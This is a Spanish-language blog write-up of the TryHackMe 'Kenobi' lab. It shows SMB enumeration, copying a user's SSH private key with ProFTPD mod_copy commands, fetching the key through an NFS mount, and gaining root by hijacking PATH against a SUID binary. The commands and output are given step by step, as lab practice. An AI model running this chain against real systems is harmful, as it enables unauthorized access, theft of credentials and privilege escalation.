<!DOCTYPE html>
<html lang="en">
  <head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0">

  <title>Kenobi Writeup</title>
  <meta property="og:title" content="Kenobi Writeup" />
  <meta name="twitter:title" content="Kenobi Writeup" />
  <meta name="description" content="Explotando Kenoby en Tryhackme">
  <meta property="og:description" content="Explotando Kenoby en Tryhackme">
  <meta name="twitter:description" content="Explotando Kenoby en Tryhackme">
  <meta name="author" content="Ps-axu"/>
  <link href='https://ps-axu.com/img/50-50.de.svg' rel='icon' type='image/x-icon'/>
  <meta property="og:image" content="https://ps-axu.com/img/avatar-favicon3-De.png" />
  <meta name="twitter:image" content="https://ps-axu.com/img/avatar-favicon3-De.png" />
  <meta name="twitter:card" content="summary" />
  <meta property="og:url" content="https://ps-axu.com/post/2021-03-27-kenobi-writeup/" />
  <meta property="og:type" content="website" />
  <meta property="og:site_name" content="ps-axu" />

  <meta name="generator" content="Hugo 0.54.0" />
  <link rel="canonical" href="https://ps-axu.com/post/2021-03-27-kenobi-writeup/" />
  <link rel="alternate" href="https://ps-axu.com/index.xml" type="application/rss+xml" title="ps-axu">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/katex.min.css" integrity="sha384-wITovz90syo1dJWVh32uuETPVEtGigN07tkttEqPv+uR2SE/mbQcG7ATL28aI9H0" crossorigin="anonymous">
  <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.13/css/all.css" integrity="sha384-DNOHZ68U8hZfKXOrtjWvjxusGo9WQnrNx2sqG0tfsghAvtVlRW3tvkXWZh58N9jp" crossorigin="anonymous">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
  <link rel="stylesheet" href="https://ps-axu.com/css/main.css" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" />
  <link rel="stylesheet" href="https://ps-axu.com/css/pygment_highlights.css" />
  <link rel="stylesheet" href="https://ps-axu.com/css/highlight.min.css" />

</head>

  <body>
    <nav class="navbar navbar-default navbar-fixed-top navbar-custom">
  <div class="container-fluid">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#main-navbar">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="https://ps-axu.com/">ps-axu</a>
    </div>

    <div class="collapse navbar-collapse" id="main-navbar">
      <ul class="nav navbar-nav navbar-right">
        
          
            <li>
              <a title="Blog" href="https://ps-axu.com/">Blog</a>
            </li>
          
        
          
            <li>
              <a title="Tags" href="https://ps-axu.com/tags">Tags</a>
            </li>
          
        

        

        
      </ul>
    </div>

    <div class="avatar-container">
      <div class="avatar-img-border">
        
          <a title="ps-axu" href="https://ps-axu.com/">
            <img class="avatar-img" src="https://ps-axu.com/img/avatar-favicon3-De.png" alt="ps-axu" />
          </a>
        
      </div>
    </div>

  </div>
</nav>




    
  
  
  




  

  <header class="header-section ">
    
    <div class="intro-header no-img">
      
      <div class="container">
        <div class="row">
          <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
            <div class="post-heading">
              <h1>Kenobi Writeup</h1>
                
                  
                    <h2 class="post-subheading">Explotando Kenoby en Tryhackme</h2>
                  
                
                
                  <span class="post-meta">
  Posted on March 27, 2021
  
</span>


                
            </div>
          </div>
        </div>
      </div>
    </div>
  </header>


    
<div class="container">
  <div class="row">
    <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
      <article role="main" class="blog-post">
        

<blockquote>
<p>Maquina orientada a profundizar en los Shares de Linux. Explotaremos el servicio samba.</p>
</blockquote>

<h2 id="enumeración">Enumeración</h2>

<pre><code>nmap --script=vuln -p- -T5 ip -oN -n nmap.kenobi.txt
</code></pre>

<p>Puertos abiertos:</p>

<pre><code>21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
36617/tcp open  unknown
37725/tcp open  unknown
38321/tcp open  unknown
44153/tcp open  unknown
</code></pre>

<h3 id="http">Http</h3>

<p>Vemos que tiene un servidor web. Hacemos un wget para ver que nos retorna:</p>

<pre><code>wget Ip
</code></pre>

<p>Nos da una foto starwars la cual no tiene mucho valor.</p>

<p>El scan de nmap nos ha dicho que puede haber algo en <code>admin.html</code>.</p>

<pre><code>wget IP\admin.html
</code></pre>

<p>Nos retorna otra imagen, por lo tanto por aquí no está claro que podamos entrar.</p>

<h3 id="smb">Smb</h3>

<p>El puerto de smb está abierto. Para ver si tenemos acceso usamos <code>smbclient</code>, con la flag <code>-L</code> para listar los <strong>shares</strong>.</p>

<pre><code class="language-bash=">└─$ smbclient -L 10.10.101.254                                                   2 ⚙
Enter WORKGROUP\kali's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      
	IPC$            IPC       IPC Service (kenobi server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available                                 
</code></pre>

<p>Vemos que hay un share llamado Anonymous, vamos a conectarnos con <code>smbclient</code> para ver que hay.</p>

<pre><code class="language-bash=">└─$ smbclient //10.10.101.254/anonymous                                          2 ⚙
Enter WORKGROUP\kali's password: 
Try &quot;help&quot; to get a list of possible commands.
smb: \&gt; dir
  .                                   D        0  Wed Sep  4 06:49:09 2019
  ..                                  D        0  Wed Sep  4 06:56:07 2019
  log.txt                             N    12237  Wed Sep  4 06:49:09 2019

		9204224 blocks of size 1024. 6877096 blocks available
smb: \&gt; 
</code></pre>

<p>Vemos que hay un archivo interesante llamado <strong>log.txt</strong>. Nos lo descargamos y lo curioseamos.</p>

<pre><code>get log.txt
</code></pre>

<pre><code>└─$ cat log.txt | head                                                               1 ⨯ 2 ⚙
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa): 
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
</code></pre>

<h3 id="ftp">FTP</h3>

<p>El puerto <strong>21</strong> de la maquina está abierto. nos conectamos por nc para ver que hay.</p>

<p>Vemos que es un servidor FTP.</p>

<pre><code>220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.104.80]
site help
214-The following SITE commands are recognized (* =&gt;'s unimplemented)
 CPFR &lt;sp&gt; pathname
 CPTO &lt;sp&gt; pathname
 HELP
 CHGRP
 CHMOD
214 Direct comments to root@kenobi
site cpfr /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
site cpto /var/id_rsa
550 cpto: Permission denied
site cpto /var/tmp/id_rsa
503 Bad sequence of commands
site cpfr /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
site cpto /var/tmp/id_rsa
250 Copy successful
</code></pre>

<h2 id="listamos-los-nfs">Listamos los nfs</h2>

<pre><code>└─# nmap -p 111 -script=nfs-ls 10.10.101.254                                                        1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-16 08:17 EDT
Nmap scan report for 10.10.101.254
Host is up (0.069s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-ls: Volume /var
|   access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION  UID  GID  SIZE  TIME                 FILENAME
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  .
| rwxr-xr-x   0    0    4096  2019-09-04T12:27:33  ..
| rwxr-xr-x   0    0    4096  2019-09-04T12:09:49  backups
| rwxr-xr-x   0    0    4096  2019-09-04T10:37:44  cache
| rwxrwxrwt   0    0    4096  2019-09-04T08:43:56  crash
| rwxrwsr-x   0    50   4096  2016-04-12T20:14:23  local
| rwxrwxrwx   0    0    9     2019-09-04T08:41:33  lock
| rwxrwxr-x   0    108  4096  2019-09-04T10:37:44  log
| rwxr-xr-x   0    0    4096  2019-01-29T23:27:41  snap
| rwxr-xr-x   0    0    4096  2019-09-04T08:53:24  www
|_
</code></pre>

<p>Ver donde está montado el nfs:</p>

<pre><code>└─# nmap -p 111 -script=nfs-statfs 10.10.101.254                                                    1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-16 08:25 EDT
Nmap scan report for 10.10.101.254
Host is up (0.077s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-statfs: 
|   Filesystem  1K-blocks  Used       Available  Use%  Maxfilesize  Maxlink
|_  /var        9204224.0  1836520.0  6877108.0  22%   16.0T        32000

Nmap done: 1 IP address (1 host up) scanned in 1.37 seconds
</code></pre>

<pre><code>└─# nmap -p 111 -script=nfs-showmount 10.10.101.254                                                 1 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-16 08:26 EDT
Nmap scan report for 10.10.101.254
Host is up (0.064s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  /var *

Nmap done: 1 IP address (1 host up) scanned in 0.78 seconds
</code></pre>

<h2 id="montamos-el-share">Montamos el Share</h2>

<pre><code>mkdir share
mount 10.10.104.80:/var share/ 
</code></pre>

<p>Nos traemos la clave rsa.</p>

<h2 id="logeandonos-como-konbi">Logeandonos como konbi</h2>

<pre><code>└─$ chmod 600 id_rsa                                                             2 ⚙
                                                                                     
┌──(kali㉿kali)-[~/bootcamp-pentest/9-THM/kenobi]
└─$ ssh -i id_rsa kenobi@10.10.104.80     
</code></pre>

<h2 id="buscando-archivos-interesantes">Buscando archivos interesantes</h2>

<pre><code>find * -perm /4000 2&gt;/dev/null
</code></pre>

<p>Output:</p>

<pre><code>bin/umount
bin/fusermount
bin/mount
bin/ping
bin/su
bin/ping6
sbin/mount.nfs
usr/lib/policykit-1/polkit-agent-helper-1
usr/lib/dbus-1.0/dbus-daemon-launch-helper
usr/lib/snapd/snap-confine
usr/lib/eject/dmcrypt-get-device
usr/lib/openssh/ssh-keysign
usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
usr/bin/chfn
usr/bin/newgidmap
usr/bin/pkexec
usr/bin/passwd
usr/bin/newuidmap
usr/bin/gpasswd
usr/bin/menu &lt;----- binario rarito
usr/bin/sudo
usr/bin/chsh
usr/bin/at
usr/bin/newgrp
</code></pre>

<h2 id="comprobamos-el-fichero">Comprobamos el Fichero</h2>

<pre><code>kenobi@kenobi:/$ /usr/bin/menu 

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :^C
</code></pre>

<p>Vemos que ejecuta 3 binarios.</p>

<p>Hacemos un strings para ver las cadenas que tiene dentro.</p>

<p>Output:</p>

<pre><code>[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
 Invalid choice
;*3$&quot;
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
</code></pre>

<p>Aquí podemos observar que el binario llama a los programas <code>curl</code>, <code>uname</code> y <code>ifconfig</code>.</p>

<p>Llamar a estos comandos de esta manera y no con path absolutos hace que esta aplicación sea vulnerable.</p>

<p>Cuando llamamos a una aplicacion por su nombre, lo que sucede es que <strong>bash</strong>, mira la variable <strong>$PATH</strong> y mira si el comando introducido lo tiene en la ruta. En esta variable de entorno se guardan las rutas a todos los ejecutables del sistema.</p>

<p>¿Pero que pasa si modificamos el <strong>$PATH</strong> y le añadimos un nuevo directorio con nuestros binarios?</p>

<p>Digamos que creamos un ejecutable llamado <code>curl</code> y lo guardamos en <code>~</code> y <strong>agregamos nuestro home al $PATH</strong>.</p>

<pre><code>export $PATH=~/:$PATH
</code></pre>

<p>Esto provocaria que al llamar a <code>curl</code> <strong>bash</strong> miraría primero en <strong>$PATH</strong> y se encontraría con un curl en el home, por lo tanto ejecutaría nuestro <strong>curl malicioso</strong>.</p>

<blockquote>
<p>Al tener el binario <strong>menu</strong> el permiso de Suid como Root hace que nos retorne una shell como root.</p>
</blockquote>

<pre><code>kenobi@kenobi:/$ cd
kenobi@kenobi:~$ vi curl
kenobi@kenobi:~$ chmod +x curl 
kenobi@kenobi:~$ export PATH=~/:$PATH
kenobi@kenobi:~$ curl 
$ 
kenobi@kenobi:~$ /usr/bin/menu 

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# whoami
root
# 
</code></pre>

      </article>

      <ul class="pager blog-pager">
        
        
          <li class="next">
            <a href="https://ps-axu.com/post/2021-04-15-ssti-writeup/" data-toggle="tooltip" data-placement="top" title="SSTI Writeup">Next Post &rarr;</a>
          </li>
        
      </ul>

      
        
      

    </div>
  </div>
</div>

    <footer>
  <div class="container">
    <div class="row">
      <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
        <ul class="list-inline text-center footer-links">
          
              <li>
                <a href="mailto:youremail@domain.com" title="Email me">
                  <span class="fa-stack fa-lg">
                    <i class="fa fa-circle fa-stack-2x"></i>
                    <i class="fas fa-envelope fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://gitlab.com/ps-axu" title="GitLab">
                  <span class="fa-stack fa-lg">
                    <i class="fa fa-circle fa-stack-2x"></i>
                    <i class="fab fa-gitlab fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
                <a href="https://linkedin.com/in/Che-r" title="LinkedIn">
                  <span class="fa-stack fa-lg">
                    <i class="fa fa-circle fa-stack-2x"></i>
                    <i class="fab fa-linkedin fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
          
          <li>
            <a href="https://ps-axu.com/index.xml" title="RSS">
              <span class="fa-stack fa-lg">
                <i class="fa fa-circle fa-stack-2x"></i>
                <i class="fa fa-rss fa-stack-1x fa-inverse"></i>
              </span>
            </a>
          </li>
          
        </ul>
        <p class="credits copyright text-muted">
          Ps-axu
          &nbsp;&bull;&nbsp;
          2021

          
            &nbsp;&bull;&nbsp;
            <a href="https://ps-axu.com/">ps-axu</a>
          
        </p>
        
        <p class="credits theme-by text-muted">
          <a href="http://gohugo.io">Hugo v0.54.0</a> powered &nbsp;&bull;&nbsp; Theme by <a href="http://deanattali.com/beautiful-jekyll/">Beautiful Jekyll</a> adapted to <a href="https://github.com/halogenica/beautifulhugo">Beautiful Hugo</a>
          
        </p>
      </div>
    </div>
  </div>
</footer>

<script src="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/katex.min.js" integrity="sha384-/y1Nn9+QQAipbNQWU65krzJralCnuOasHncUFXGkdwntGeSvQicrYkiUBwsgUqc1" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.7.1/contrib/auto-render.min.js" integrity="sha384-dq1/gEHSxPZQ7DdrM82ID4YVol9BYyU7GbWlIwnwyPzotpoc57wDw/guX8EaYGPx" crossorigin="anonymous"></script>
<script src="https://code.jquery.com/jquery-1.12.4.min.js" integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://ps-axu.com/js/main.js"></script>
<script src="https://ps-axu.com/js/highlight.min.js"></script>
<script> hljs.initHighlightingOnLoad(); </script>
<script> renderMathInElement(document.body); </script>





  </body>
</html>

